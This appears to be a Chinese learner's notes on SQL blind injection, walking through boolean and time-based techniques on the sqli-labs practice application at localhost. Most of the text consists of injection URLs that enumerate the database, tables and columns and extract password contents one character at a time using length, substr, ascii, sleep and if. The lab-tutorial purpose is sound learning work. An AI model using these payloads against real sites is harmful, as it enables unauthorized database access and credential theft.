sql盲注 解决_sql盲注学习笔记
sql盲注
在剛接觸sql注入的時候還不太清楚sql盲注是什么,很多東西都要自己
去體會才能知道到底是什么樣子的。
sql注入之盲注
盲注其實是sql注入的一種,之所以稱為盲注是因為他不會根據你sql注入的攻擊語句返回你想要知道的錯誤信息。
盲注分為兩類:
1.布爾盲注 布爾很明顯Ture跟Fales,也就是說它只會根據 你的注入信息返回Ture跟Fales,也就沒有了之前的報錯信息。
2.時間盲注 界面返回值只有一種,true 無論輸入任何值 返回情況都會按正常的來處理。加入特定的時間函數,通過查看web頁面返回的時間差來判斷注入的語句是否正確。
需要用到的函數:
Length()函數 返回字符串的長度
Substr()截取字符串
Ascii()返回字符的ascii碼
sleep(n):將程序掛起一段時間 n為n秒
if(expr1,expr2,expr3):判斷語句 如果第一個語句正確就執行第二個語句如果錯誤執行第三個語句
先在mysql里測試下這幾個函數:
這里使用的是security庫
length函數:
substr函數:
Ascii:
sleep跟if由于是時間盲注就不一一測試了。
布爾盲注
sqli-less-8為布爾盲注這里就用它做下測試
剛開始用id=1’/ ’) “ 測試了一下發現不會爆出錯誤信息 只有正確跟錯誤 less-8應該就是布爾盲注了吧 然后通過上面的函數首先構造一個猜測數據庫名長度的函數
http://127.0.0.1/Less-8/?id=1'and (length(database()))>10 --+
返回錯誤 說明length小于10
然后繼續猜測是不是大于5
http://127.0.0.1/Less-8/?id=1' and (length(database()))>5 --+
返回正確說明長度大于5小于10
最后得到結果為
http://127.0.0.1/Less-8/?id=1' and (length(database()))=8 --+
返回正確 長度為八 也就是security
接下來利用substr函數與ascii函數構造猜測數據庫名ascii碼的值的語句 因為現在只知道長度不知道具體內容
構造語句如下
http://127.0.0.1/Less-8/?id=1' and (ascii(substr(database(),1,1)))>100 --+
返回正確說明第一個字母的ascii碼大于100
http://127.0.0.1/Less-8/?id=1' and (ascii(substr(database(),1,1)))>110 --+
返回正確
http://127.0.0.1/Less-8/?id=1' and (ascii(substr(database(),1,1)))<120 --+
返回正確
http://127.0.0.1/Less-8/?id=1' and (ascii(substr(database(),1,1)))<115 --+
返回錯誤
http://127.0.0.1/Less-8/?id=1' and (ascii(substr(database(),1,1)))=115 --+
返回正確 通過查ascii碼表可知 ascii(115)=s 也就是security 的第一個字母
通過改變database()后面的數字 可以繼續猜測第二個字母第三個字母
接下來改變語句去猜測表名
構造這個語句的時候發現自己還是不夠熟練 弄錯了好幾次
http://127.0.0.1/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>100 --+
返回正確 當等于101的時候返回正確 101為 e 查看mysql 得知第一個表為emails 正確結果
http://127.0.0.1/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)))=114 --+
猜測列名只需要改變幾個地方
http://127.0.0.1/Less-8/?id=1' and (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)))>100 --+
獲取user表的內容 經過猜測 ascii為 105 為i 也就是表的第一個列名 id的第一個字母 同樣 通過修改 limit 0,1 獲取第二個列名 修改后面1,1的獲取當前列的其他字段
接著獲取 username 與 password 里面的內容 因為知道了列名所以直接 select password from users 就可以獲取password里面的內容 username一樣
具體語句如下
http://127.0.0.1/Less-8/?id=1' and (ascii(substr(( select password from users limit 0,1),1,1)))=68--+
ascii(68)=D 正確
手工盲注很繁瑣 需要一個一個的試 不過現在還是先學習手工理解了sql注入的原理再去用工具比較好
時間盲注
sqli-less-9為時間盲注
前面已經說過slee()函數跟if函數了
這里就直接構造如下語句
http://127.0.0.1/Less-9/?id=1' and (if(ascii(substr(database(),1,1))>100,sleep(10),null)) --+
如果返回正確則 頁面會停頓10秒,返回錯誤則會立馬返回
其他與布爾盲注都是差不多的
post類的布爾盲注與時間盲注
前面說的都是get類的盲注,post類的布爾盲注只是把and換成or其他不變,時間盲注有些不同因為在post類里sleep函數會被放大很多也就是說那個延時時間會很長,不過并不影響我們進行測試。
總結
以上是生活随笔為你收集整理的sql盲注 解决_sql盲注学习笔记的全部內容,希望文章能夠幫你解決所遇到的問題。
